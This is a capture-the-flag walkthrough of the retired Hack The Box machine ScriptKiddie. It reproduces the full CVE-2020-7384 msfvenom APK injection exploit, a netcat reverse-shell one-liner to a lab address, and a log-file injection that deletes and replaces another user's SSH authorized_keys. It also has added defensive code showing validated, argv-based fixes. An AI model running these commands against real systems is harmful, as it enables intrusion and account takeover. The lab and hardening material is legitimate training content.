This post documents the complete walkthrough of ScriptKiddie, a retired vulnerable VM created by 0xdf, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

Background

ScriptKiddie is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports on the host.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.226 --rate=500
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-02-09 08:31:53 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.226
Discovered open port 5000/tcp on 10.10.10.226
rate:  0.00-kpps, 100.00% done, waiting -150-secs, found=2

Let’s follow up with nmap on the discovered ports to identify their services.

nmap -n -v -Pn -p22,5000 -A --reason 10.10.10.226 -oN nmap.txt
...
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    syn-ack ttl 63 Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods:
|_  Supported Methods: OPTIONS GET POST HEAD
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5

Let’s check out the HTTP service and see what we get.

Looks good!

Metasploit Framework 6.0.11 - msfvenom APK template command injection

Here’s our first clue.

Here’s our exploit.

I modify the exploit slightly to suit my purpose like a true scriptkiddie. :wink:

exploit.py
#!/usr/bin/env python3
# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
# Exploit Author: Justin Steven
# Vendor Homepage: https://www.metasploit.com/
# Software Link: https://www.metasploit.com/
# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
# CVE : CVE-2020-7384

import subprocess
import os
from base64 import b64encode
import sys

# The command to run on the target is taken from the first argument
if len(sys.argv) != 2:
    sys.exit(f"usage: {sys.argv[0]} '<command>'")
payload = sys.argv[1]

# b64encode to avoid badchars (keytool is picky)
payload_b64 = b64encode(payload.encode()).decode()
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"

print(f"[+] Manufacturing evil apkfile")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()

tmpdir = "./"
apk_file = os.path.join(tmpdir, "evil.apk")
empty_file = os.path.join(tmpdir, "empty")
keystore_file = os.path.join(tmpdir, "signing.keystore")
storepass = keypass = "password"
key_alias = "signing.key"

# Touch empty_file
open(empty_file, "w").close()

# Create apk_file
subprocess.check_call(["zip", "-j", apk_file, empty_file])

# Generate signing key with malicious -dname
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
                       "-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])

# Sign APK using our malicious dname
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
                       "-storepass", storepass, "-keypass", keypass, apk_file, key_alias])

print()
print(f"[+] Done! apkfile is at {apk_file}")

os.remove(empty_file)
os.remove(keystore_file)

Time to generate our payload.

rm -rf /tmp/p; mkfifo /tmp/p; bash </tmp/p | nc 10.10.16.125 1234 >/tmp/p

Load it up in the online msfvenom generator.

And watch a reverse shell appear on your netcat listener.
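The bug class behind the exploit above is an attacker-controlled certificate Distinguished Name that reaches a shell: the DN from the uploaded APK is pasted into a keytool command string, and a single quote followed by a pipe inside it becomes a second command. The following is an added example, not Metasploit's code and not the exploit from the post; it puts the vulnerable string-building shape beside an allow-list validator and an argv-based builder. The DN values and the keystore/alias names are constructed.

```python
"""Vulnerable versus hardened handling of a certificate DN that is passed to
keytool.  Added example; not Metasploit's code.  All DNs are constructed."""
import re
import shlex
import subprocess

# Attribute types you expect in an APK signer's subject, with values limited
# to characters that actually occur in certificate subjects.  Quotes, '|',
# ';', '$', backticks and '#' are not in the set, so an injected DN cannot
# match.
_ATTR = r"(?:CN|OU|O|L|ST|C|EMAILADDRESS)=[A-Za-z0-9 ._@\-]*"
_DN_RE = re.compile(rf"^{_ATTR}(?:,\s*{_ATTR})*$")


def dname_is_safe(dname: str) -> bool:
    """Allow-list check: True only for a well-formed DN built from known
    attributes and benign characters."""
    return _DN_RE.fullmatch(dname) is not None


def vulnerable_cmdline(keystore: str, alias: str, dname: str) -> str:
    """The vulnerable shape: the DN is pasted into one string that a shell
    will parse.  A single quote inside the DN ends the quoting, and whatever
    follows it is interpreted by the shell."""
    return (f"keytool -genkey -keystore {keystore} -alias {alias} "
            f"-storepass password -keypass password -keyalg RSA -dname '{dname}'")


def keytool_argv(keystore: str, alias: str, dname: str) -> list:
    """Hardened shape: validate, then build an argv list.  With a list,
    subprocess execs keytool directly and no shell ever sees the DN."""
    if not dname_is_safe(dname):
        raise ValueError(f"refusing suspicious -dname: {dname!r}")
    return ["keytool", "-genkey", "-keystore", keystore, "-alias", alias,
            "-storepass", "password", "-keypass", "password",
            "-keyalg", "RSA", "-keysize", "2048", "-dname", dname]


def quoted_cmdline(argv: list) -> str:
    """If a shell string is unavoidable, quote every word; the DN then
    survives the shell as exactly one argument, metacharacters included."""
    return " ".join(shlex.quote(word) for word in argv)


def dname_as_seen_by_keytool(cmdline: str) -> str:
    """Tokenise the way a POSIX shell would and return the last word, i.e.
    the value keytool would actually receive for -dname."""
    return shlex.split(cmdline)[-1]


def generate_key(keystore: str, alias: str, dname: str) -> None:
    """Runs keytool with the argv form (shell=False is subprocess's default)."""
    subprocess.check_call(keytool_argv(keystore, alias, dname))


if __name__ == "__main__":
    benign = "CN=Android Debug, O=Android, C=US"          # constructed
    evil = "CN='|echo aWQ= | base64 -d | sh #"            # same shape as the exploit's dname
    print("benign accepted:", dname_is_safe(benign))
    print("evil accepted:", dname_is_safe(evil))
    print("quoted, evil DN reaches keytool as one word:",
          dname_as_seen_by_keytool(quoted_cmdline(["keytool", "-dname", evil])) == evil)
```

Validation and argv construction are independent defences: the allow-list rejects the DN outright, while the list form (or shlex quoting, if a string is truly required) makes sure that even a DN full of metacharacters is delivered to keytool as data rather than parsed as commands.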

The file user.txt is in kid’s home directory.

Privilege Escalation

During enumeration of kid’s account, I notice the presence of another account: pwn. And pwn appears to be running some kind of script.

This is what the script looks like.

Note: I found out later that pwn is using incron to execute scanlosers.sh whenever /home/kid/logs/hackers, having been opened for writing, is closed.

From kid to pwn

A command injection vulnerability appears to be present in scanlosers.sh. Notice that cut only strips the first two fields and leaves the rest of each line intact, so anything after the second field is passed through to the command the script runs? Furthermore, pwn has write access to /home/kid/logs/hackers as shown above. Let’s echo an SSH public key we control to /home/pwn/.ssh/authorized_keys from kid’s shell like so.

echo "1 2 ; rm -rf /home/pwn/.ssh/authorized_keys && echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILX1GQuhaRzWOcA4+b26Az8EGvY4puh6jBkex9QuHiNS >> /home/pwn/.ssh/authorized_keys #" >> logs/hackers

And there you have it.
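The fix for a log consumer like scanlosers.sh is to treat the remainder of each line as data and only let it reach the scanner once it has been proven to be an address. The following is an added example, not the box's script (which the post does not reproduce): it drops the first two fields as the post says cut does, validates the remainder strictly as an IPv4 address, and runs the scan as an argv list rather than a shell string. The log lines, the assumed `<date> <time> <ip>` line shape and the nmap invocation are constructed for illustration.

```python
"""Hardened log consumer: validate the field before it reaches a scanner.
Added example; not the box's scanlosers.sh.  Log lines are constructed."""
import ipaddress
import shlex
import subprocess
from typing import List, Tuple

# Constructed sample of the hackers log.  The last line is the injection
# shape from the post: two throwaway fields, then shell syntax.
SAMPLE_LOG = """\
2021-02-09 08:31:53 10.10.16.125
2021-02-09 08:32:10 10.10.16.125
2021-02-09 08:35:44 10.10.16.125;id
1 2 ; touch /tmp/injected #
"""


def vulnerable_command(rest_of_line: str) -> str:
    """The vulnerable shape: whatever survived cut is glued into a string
    handed to sh -c, so ';' and '#' are interpreted by the shell."""
    return f"nmap --top-ports 10 {rest_of_line}"


def extract_targets(log_text: str) -> Tuple[List[str], List[str]]:
    """Drop the first two fields of each line (the effect of cut -d' ' -f3-)
    and keep the remainder only if it parses as exactly one IPv4 address.
    Returns (unique accepted targets, rejected remainders)."""
    accepted, rejected = set(), []
    for line in log_text.splitlines():
        fields = line.split(" ")
        if len(fields) < 3:
            rejected.append(line)
            continue
        rest = " ".join(fields[2:])
        try:
            ip = ipaddress.IPv4Address(rest)   # raises on ';', spaces, '#', ...
        except ValueError:
            rejected.append(rest)
            continue
        accepted.add(str(ip))
    return sorted(accepted), rejected


def scan_argv(ip: str) -> List[str]:
    """Hardened shape: an argv list, never a shell string.  The nmap
    invocation is assumed, not the box's."""
    return ["nmap", "--top-ports", "10", "-oN", f"recon/{ip}.nmap", ip]


def run_scans(log_text: str, dry_run: bool = True) -> List[str]:
    """Validate, then exec each scan without a shell.  Returns a shell-safe
    rendering of every command so the caller can log what ran."""
    targets, rejected = extract_targets(log_text)
    for bad in rejected:
        print(f"[!] rejected log entry: {bad!r}")
    commands = []
    for ip in targets:
        argv = scan_argv(ip)
        commands.append(" ".join(shlex.quote(a) for a in argv))
        if not dry_run:
            subprocess.Popen(argv)   # no shell=True, no string interpolation
    return commands


if __name__ == "__main__":
    for cmd in run_scans(SAMPLE_LOG):
        print("[+] would run:", cmd)
```

Note that the validation is what matters: with a bare argv list but no check, an entry such as `10.10.16.125;id` would no longer execute anything, but it would still be passed to nmap as a nonsensical target, so rejecting and logging it is the better outcome for whoever reviews the recon directory later.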

GTFOBin - msfconsole

Surprise mother, father…

pwn is able to sudo msfconsole!

That is as good as having a root shell.
